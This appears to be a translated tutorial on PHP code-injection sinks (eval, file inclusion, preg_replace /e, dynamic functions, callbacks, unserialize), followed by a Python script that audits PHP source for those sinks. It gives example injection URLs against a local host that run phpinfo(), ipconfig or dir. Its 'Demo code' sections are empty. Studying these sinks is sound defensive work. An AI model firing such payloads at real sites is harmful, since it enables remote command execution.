1. Code execution functions
Functions that can execute code in PHP, such as eval(), assert(), `` (the backtick operator), system(), exec(), shell_exec(), passthru(), escapeshellcmd(), pcntl_exec(), etc.
Demo code 1.1:
2. File inclusion code injection
Under specific conditions, the file inclusion functions include(), include_once(), require(), and require_once() allow code injection.
When allow_url_include = On and the PHP version is >= 5.2.0, code injection occurs.
Demo code 2.1:
Access http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E to run phpinfo().
3. Regular expression matching code injection
Code injection caused by the well-known preg_replace() function. When the /e pattern modifier is present in the pattern, code execution is allowed. We discuss this in three cases.
3.1 preg_replace() pattern parameter injection
Code injection through pattern, the first parameter.
When magic_quotes_gpc = Off, the code is executed.
Demo code 3.1:
Access http://127.0.0.1/preg_replace1.php?reg=%3C\/php%3E/e to run phpinfo().
3.2 preg_replace() replacement parameter injection
Code injection through replacement, the second parameter, which results in code execution.
Demo code 3.2:
When we submit http://127.0.0.1/preg_replace2.php?h=phpinfo(), phpinfo() runs.
3.3 preg_replace() injection through the third parameter
We construct the subject parameter to execute code. Submitting http://127.0.0.1/preg_replace3.php?h=phpinfo() or http://127.0.0.1/preg_replace3.php?h=${phpinfo%28%29} causes code execution.
Demo code 3.3:
4. Dynamic code execution
4.1 Dynamic variable code execution
Demo code 4.1:
Submitting http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig executes the ipconfig command.
4.2 Dynamic function code execution
Demo code 4.2:
Submitting http://127.0.0.1/create_function.php?foobar=system%28dir%29 runs the dir command.
5. Others
5.1 Code execution through the ob_start() function
Demo code 5.1:
5.2 Code execution through the array_map() function
Demo code 5.2:
Submitting http://127.0.0.1/array_map.php?callback=phpinfo executes phpinfo().
5.3 unserialize () and eval ()
unserialize() is a frequently used function in PHP. Improper use of unserialize() may cause security risks.
Submitting http://127.0.0.1/unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} executes phpinfo().
5.4 Functions that may easily cause security problems
There are many functions of the same type:
array_map()
usort(), uasort(), uksort()
array_filter()
array_reduce()
array_diff_uassoc(), array_diff_ukey()
array_udiff(), array_udiff_assoc(), array_udiff_uassoc()
array_intersect_assoc(), array_intersect_uassoc()
array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()
array_walk(), array_walk_recursive()
xml_set_character_data_handler()
xml_set_default_handler()
xml_set_element_handler()
xml_set_end_namespace_decl_handler()
xml_set_external_entity_ref_handler()
xml_set_notation_decl_handler()
xml_set_processing_instruction_handler()
xml_set_start_namespace_decl_handler()
xml_set_unparsed_entity_decl_handler()
stream_filter_register()
set_error_handler()
register_shutdown_function()
register_tick_function()
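
For code review, the sinks named in sections 1 to 5 can be searched for mechanically. The following is an added example, not code from the original article: a line-based heuristic audit script in Python that flags calls to those functions when the relevant argument is not a constant. The names scan, SINKS and SAMPLE, the argument positions, and the sample PHP input are assumptions made for this example.

```python
import re

# Sink names come from the article; the value is the argument position to
# inspect (None = any argument). The positions are this example's assumptions.
SINKS = {
    **dict.fromkeys("eval assert system exec shell_exec passthru pcntl_exec include "
                    "include_once require require_once unserialize".split()),
    **dict.fromkeys("array_map ob_start set_error_handler "
                    "register_shutdown_function register_tick_function".split(), 0),
    **dict.fromkeys("usort uasort uksort array_filter array_reduce array_walk "
                    "array_walk_recursive".split(), 1),
}
NAMES = "|".join(sorted(SINKS, key=len, reverse=True))
# The lookbehind skips $vars, ->methods, ::statics and longer names (curl_exec).
CALL = re.compile(r"(?<![\w$>:])(" + NAMES + r")\b\s*\(?(?=([^;]*))", re.I)
# preg_replace() with a variable pattern, or a literal pattern carrying /e.
PREG_E = re.compile(
    r"(?<![\w$>:])preg_replace\s*\(\s*(\$|(['\"])[^'\"]*[^\w\s\\'\"][a-z]*e[a-z]*\2)", re.I)

def scan(php_source):
    """Return (line, sink, reason) for every call a reviewer should look at."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "*", "/*")):
            continue  # whole-line comments only: a line heuristic, not a parser
        if PREG_E.search(line):
            findings.append((lineno, "preg_replace", "variable pattern or /e modifier"))
        for m in CALL.finditer(line):
            name, args = m.group(1).lower(), m.group(2).split(",")
            pos = SINKS[name]
            checked = args if pos is None else args[pos:pos + 1]
            if any("$" in a for a in checked):
                findings.append((lineno, name, "non-constant argument"))
    return findings

# Constructed sample input, not code from the article.
SAMPLE = r"""<?php
// eval($_GET['x']); commented out, ignored
$out = array_map($_GET['callback'], $items);
$out = array_map('trim', $items);
usort($items, 'strcmp');
include $_GET['a'];
echo preg_replace('/(.*)/e', 'strtoupper("\\1")', $h);
echo preg_replace('/\s+/', ' ', $h);
$obj = unserialize($_GET['saved_code']);
curl_exec($ch);
"""

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Each finding is a starting point for manual review: the script does not track where a variable's value comes from, so a flagged call still has to be traced back to its input.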